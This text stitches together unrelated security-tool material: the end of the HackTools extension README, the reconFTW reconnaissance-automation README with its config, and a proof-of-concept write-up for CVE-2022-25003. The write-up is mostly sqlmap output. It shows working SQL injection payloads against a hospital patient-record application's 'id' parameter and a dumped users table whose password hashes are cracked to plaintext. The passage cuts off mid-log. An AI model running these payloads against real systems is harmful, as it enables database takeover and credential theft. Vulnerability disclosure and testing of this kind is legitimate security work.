store** [here.](https://chrome.google.com/webstore/detail/hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi) Otherwise, you can build the project yourself from the source code <h2> <img src="https://raw.githubusercontent.com/edent/SuperTinyIcons/master/images/svg/firefox.svg" alt="firefox_icon" title='Firefox' width="25" height="25" style="float:left;" /> Mozilla Firefox </h2> You can download **HackTools** on the Firefox browser add-ons [here.](https://addons.mozilla.org/en-US/firefox/addon/hacktools/) <h2> <img src="https://raw.githubusercontent.com/edent/SuperTinyIcons/master/images/svg/safari.svg" alt="safari_icon" title='Safari' width="25" height="25" style="float:left;" /> Instructions to build for Safari </h2> Create a safari web extension project using the command below. *This is to be run once.* ```bash xcrun safari-web-extension-coverter [path_to_dist_folder] ``` Follow the instructions to create the project the default language should be Swift. - Build project. - Open Safari and enable unsigned extensions; Develop -> Allow Unsigned Extensions. - Open Safari -> Preferences -> Extensions and enable Hack-Tools - Click on the extension icon and switch to full screen mode. *Instructions provided by [jayluxferro](https://github.com/LasCC/Hack-Tools/issues/88)* ### Build from source code ```bash git clone https://github.com/LasCC/Hack-Tools.git cd Hack-Tools npm install && npm run build ``` Once the build is done correctly, webpack will create a new folder called **dist** After that you need to go to the **extension** tab on your chrome based navigator and turn on the **developer mode** <img alt="extension_tutorial" src="https://i.imgur.com/ZHwUTfk.png" /> Then click on the **load unpacked** button in the top left corner <img alt="extension_tutorial" src="https://i.imgur.com/TLDjLyO.png" /> Once you clicked on the button you just need to select the **dist folder** and that's it ! 🎉 <img alt="extension_tutorial" src="https://i.imgur.com/fH894v8.png" /> ## Authors 👤 <a href="http://github.com/LasCC" alt="Github_account_Ludovic_COULON">**Ludovic COULON**<a/> & <a href="http://github.com/rb-x" alt="Github_account_Riadh_BOUCHAHOUA">**Riadh BOUCHAHOUA**<a/> ## Show your support You can give a ⭐️ if this project helped you ! Note that this project is maintained, developed and made available for **free**, you can offer us a coffee, it will be very **encouraging and greatly appreciated** 😊 <a href="https://www.paypal.me/hacktoolsEXT" target="_blank"><img src="https://img.shields.io/badge/PayPal-00457C?style=for-the-badge&logo=paypal&logoColor=white" alt="Paypal" style="height: 30px !important;width: auto !important"></a>
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.1.3"> <img src="https://img.shields.io/badge/release-v2.1.3-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/[email protected]"> </a> <a href="https://hub.docker.com/r/six2dez/reconftw"> <img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw"> </a> </p> <h3 align="center">Summary</h3> **ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target. So, what are you waiting for Go! Go! Go! :boom: 📔 Table of Contents ----------------- - [💿 Installation:](#-installation) - [a) In your PC/VPS/VM](#a-in-your-pcvpsvm) - [b) Docker container 🐳 (2 options)](#b-docker-container--2-options) - [1) From DockerHub](#1-from-dockerhub) - [2) From repository](#2-from-repository) - [⚙️ Config file:](#️-config-file) - [Usage:](#usage) - [Example Usage:](#example-usage) - [Axiom Support: :cloud:](#axiom-support-cloud) - [BBRF Support: :computer:](#bbrf-support-computer) - [Sample video:](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Main commands:](#main-commands) - [How to contribute:](#how-to-contribute) - [Need help? :information_source:](#need-help-information_source) - [You can support this work buying me a coffee:](#you-can-support-this-work-buying-me-a-coffee) - [Sponsors ❤️](#sponsors-️) - [Thanks :pray:](#thanks-pray) - [Disclaimer](#disclaimer) --- # 💿 Installation: ## a) In your PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) Docker container 🐳 (2 options) - Docker parameters usage ``` bash -d -> Detached -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -> Share CFG with the Docker -v $PWD/Recon/:/root/Tools/reconftw/Recon/ -> Share output folder with the Host --name reconftwSCAN -> Docker name --rm -> Automatically remove the container when it exits '-d target.com -r' -> reconftw parameters ``` ### 1) From [DockerHub](https://hub.docker.com/r/six2dez/reconftw) ```bash docker pull six2dez/reconftw:main # Download and configure CFG file wget https://raw.githubusercontent.com/six2dez/reconftw/main/reconftw.cfg mkdir Recon docker run -d -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm six2dez/reconftw:main -d target.com -r ``` ### 2) From repository ```bash git clone https://github.com/six2dez/reconftw cd reconftw docker build -t reconftw Docker/. # Running from reconftw root folder, configure values properly for your needs docker run -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm reconftw -d target.com -r ``` # ⚙️ Config file: > A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) update_resolvers=true proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/notify.conf # No need to define #SUBFINDER_CONFIG=~/.config/subfinder/config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #UDORK_COOKIE="c_user=XXXXXXXXXX; xs=XXXXXXXXXXXXXX" #SHODAN_API_KEY="XXXXXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #findomain_virustotal_token="XXXXXXXXXXXXXXXXX" #findomain_spyse_token="XXXXXXXXXXXXXXXXX" #findomain_securitytrails_token="XXXXXXXXXXXXXXXXX" #findomain_fb_token="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" DEBUG_ERROR="2>/dev/null" # Osint OSINT=true GOOGLE_DORKS=true GITHUB_DORKS=true METADATA=true EMAILS=true DOMAIN_INFO=true METAFINDER_LIMIT=20 # Max 250 # Subdomains SUBDOMAINS_GENERAL=true SUBPASSIVE=true SUBCRT=true SUBANALYTICS=true SUBBRUTE=true SUBSCRAPING=true SUBPERMUTE=true SUBTAKEOVER=true SUBRECURSIVE=true SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries ZONETRANSFER=true S3BUCKETS=true REVERSE_IP=false # Web detection WEBPROBESIMPLE=true WEBPROBEFULL=true WEBSCREENSHOT=true UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # You can change to aquatone if gowitness fails, comment the one you don't want AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot # Host FAVICON=true PORTSCANNER=true PORTSCAN_PASSIVE=true PORTSCAN_ACTIVE=true CLOUD_IP=true # Web analysis WAF_DETECTION=true NUCLEICHECK=true NUCLEI_SEVERITY="info,low,medium,high,critical" URL_CHECK=true URL_GF=true URL_EXT=true JSCHECKS=true FUZZ=true CMS_SCANNER=true WORDLIST=true ROBOTSWORDLIST=true # Vulns VULNS_GENERAL=false XSS=true CORS=true TEST_SSL=true OPEN_REDIRECT=true SSRF_CHECKS=true CRLF_CHECKS=true LFI=true SSTI=true SQLI=true BROKENLINKS=true SPRAY=true COMM_INJ=true PROTO_POLLUTION=true # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false DEEP_LIMIT=500 DIFF=false REMOVETMP=false REMOVELOG=false PROXY=false SENDZIPNOTIFY=false PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 GOSPIDER_THREADS=50 GITDORKER_THREADS=5 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 ARJUN_THREADS=20 GAUPLUS_THREADS=10 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited PUREDNS_TRUSTED_LIMIT=400 WEBSCREENSHOT_THREADS=200 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 # Timeouts CMSSCAN_TIMEOUT=3600 FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) AXIOM=false AXIOM_FLEET_LAUNCH=false AXIOM_FLEET_NAME="reconFTW" AXIOM_FLEET_COUNT=10 AXIOM_FLEET_REGIONS="eu-central" AXIOM_FLEET_SHUTDOWN=true # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" # BBRF BBRF_CONNECTION=false BBRF_SERVER=https://demo.bbrf.me/bbrf BBRF_USERNAME=user BBRF_PASSWORD=password # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' yellow='\033[0;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' reset='\033[0m' ``` </details> # Usage: > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | # Example Usage: **To perform a full recon on single target** ```bash ./reconftw.sh -d target.com -r ``` **To perform a full recon on a list of targets** ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` **Perform full recon with more time intense tasks** *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` **Perform recon in a multi domain target** ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` **Perform recon with axiom integration** ```bash ./reconftw.sh -d target.com -r -v ``` **Perform all steps (whole recon + all attacks) a.k.a. YOLO mode** ```bash ./reconftw.sh -d target.com -a ``` **Show help section** ```bash ./reconftw.sh -h ``` # Axiom Support: :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) * As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. * During the configuration of axiom you need to select `reconftw` as provisoner. * You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # BBRF Support: :computer: * To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf. * During the execution of the scans the results will be added dinamically when each step ends. * Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI. # Sample video: ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information parser ([domainbigdata](https://domainbigdata.com/)) - Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester), [emailfinder](https://github.com/Josue87/EmailFinder)) - Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) - Google Dorks ([uDork](https://github.com/m3n0sd0n4ld/uDork)) - Github Dorks ([GitDorker](https://github.com/obheda12/GitDorker)) ## Subdomains - Passive ([subfinder](https://github.com/projectdiscovery/subfinder), [assetfinder](https://github.com/tomnomnom/assetfinder), [amass](https://github.com/OWASP/Amass), [findomain](https://github.com/Findomain/Findomain), [crobat](https://github.com/cgboal/sonarsearch), [waybackurls](https://github.com/tomnomnom/waybackurls), [github-subdomains](https://github.com/gwen001/github-subdomains), [Anubis](https://jldc.me), [gau](https://github.com/lc/gau)) - Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr), [tls.bufferover](tls.bufferover.run) and [dns.bufferover](dns.bufferover.run))) - Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator)) - JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - Recursive search. - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dnsrecon](https://github.com/darkoperator/dnsrecon)) ## Hosts - IP and subdomains WAF checker ([cf-check](https://github.com/dwisiswant0/cf-check) and [wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [shodan-cli](https://cli.shodan.io/), Subdomains IP resolution with[resolveDomains](https://github.com/Josue87/resolveDomains)) - Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) - Cloud providers check ([clouddetect](https://github.com/99designs/clouddetect)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap)) - Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gauplus](https://github.com/bp0lr/gauplus), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URLPatterns Search ([gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [LinkFinder](https://github.com/GerbenJavado/LinkFinder), [getjswords](https://github.com/m4ll0k/BBTz)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider)) - S3 bucket finder ([S3Scanner](https://github.com/sa7mon/S3Scanner)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Extras - Multithread ([Interlace](https://github.com/codingo/Interlace)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support # Mindmap/Workflow ![Mindmap](images/mindmapv2.png) ## Data Keep Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data. * Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) * Clone your project: `git clone https://gitlab.com/example/reconftw-data` * Get inside the cloned repository: `cd reconftw-data` * Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"` * Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) * Update upstream's repo: `git fetch upstream` * Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands: * Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` * Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute: If you want to contribute to this project you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## You can support this work buying me a coffee: [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) # Sponsors ❤️ **This section shows the current financial sponsors of this project** [<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian) # Thanks :pray: * Thank you for lending a helping hand towards the development of the project! - [Spyse](https://spyse.com/) - [Networksdb](https://networksdb.io/) - [Intelx](https://intelx.io/) - [BinaryEdge](https://www.binaryedge.io/) - [Censys](https://censys.io/) - [CIRCL](https://www.circl.lu/) - [Whoxy](https://www.whoxy.com/) # Disclaimer Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly. The material contained in this repository is licensed under GNU GPLv3.
## [CVE-2022-25003](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25003) ![](https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-25003/Docs/Screenshot%202022-03-01%20121609.png) ## Description: The `id` parameter from Hospital Patient Record Management System v1.0 appears to be vulnerable to multiple SQL injection attacks. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL ## All in one: ```mysql PS C:\Users\venvaropt\Desktop\CVE-2022-25003> python .\PoC-SQL-automation-all-in-one.py SQL - Injecting for parameter 'id' in view_doctors.php app ,d d ,d d8 888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b / 888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/ 888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/ 888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y 888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ / _/ {1.6.1.2#dev} https://sqlmap.org https://www.nu11secur1ty.com/ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:57:34 /2022-03-01/ [11:57:34] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=blov3a6cmm7...5ljvdr4pu6'). Do you want to use those [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 1807=1807 AND 'uYTA'='uYTA Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 6423 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(6423=6423,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'KEjB'='KEjB Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 3271 FROM (SELECT(SLEEP(3)))ySPv) AND 'vkzK'='vkzK Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-5548' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717071,0x71687362656d5a76494d674d5741614e7542625946744c6c5370416b486e7374717953684d687950,0x71716a7671),NULL,NULL,NULL,NULL,NULL-- - --- [11:57:35] [INFO] testing MySQL [11:57:35] [INFO] confirming MySQL [11:57:35] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.52, PHP, PHP 8.1.2 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [11:57:35] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db' [11:57:35] [INFO] resumed: '0192023a7bbd73250516f069df18b500','admin' [11:57:35] [INFO] resumed: '97a8afcf419cc231e1bdcd8584b0a246','cblake' [11:57:35] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [11:57:35] [INFO] using hash method 'md5_generic_passwd' [11:57:35] [INFO] resuming password 'admin123' for hash '0192023a7bbd73250516f069df18b500' for user 'admin' [11:57:35] [INFO] resuming password 'stupid123' for hash '97a8afcf419cc231e1bdcd8584b0a246' for user 'cblake' Database: hprms_db Table: users [2 entries] +----------+----------------------------------------------+ | username | password | +----------+----------------------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 (admin123) | | cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) | +----------+----------------------------------------------+ [11:57:35] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv' [11:57:35] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost' [*] ending @ 11:57:35 /2022-03-01/ SQL - Injecting for parameter 'id' in manage_doctor.php app ,d d ,d d8 888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b / 888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/ 888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/ 888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y 888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ / _/ {1.6.1.2#dev} https://sqlmap.org https://www.nu11secur1ty.com/ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:57:39 /2022-03-01/ [11:57:39] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=fgqostf9v6a...c07feq0430'). Do you want to use those [Y/n] Y [11:57:39] [INFO] checking if the target is protected by some kind of WAF/IPS [11:57:40] [INFO] testing if the target URL content is stable [11:57:40] [INFO] target URL content is stable [11:57:40] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [11:57:40] [INFO] testing for SQL injection on GET parameter 'id' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [11:57:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [11:57:40] [WARNING] reflective value(s) found and filtering out [11:57:41] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Physical medicine and rehabilitation") [11:57:41] [INFO] testing 'Generic inline queries' [11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [11:57:41] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [11:57:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [11:57:41] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [11:57:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [11:57:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [11:57:41] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [11:57:41] [INFO] testing 'MySQL inline queries' [11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [11:57:41] [WARNING] time-based comparison requires larger statistical model, please wait...... (done) [11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [11:57:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [11:57:47] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [11:57:47] [INFO] testing 'Generic UNION query (NULL) - 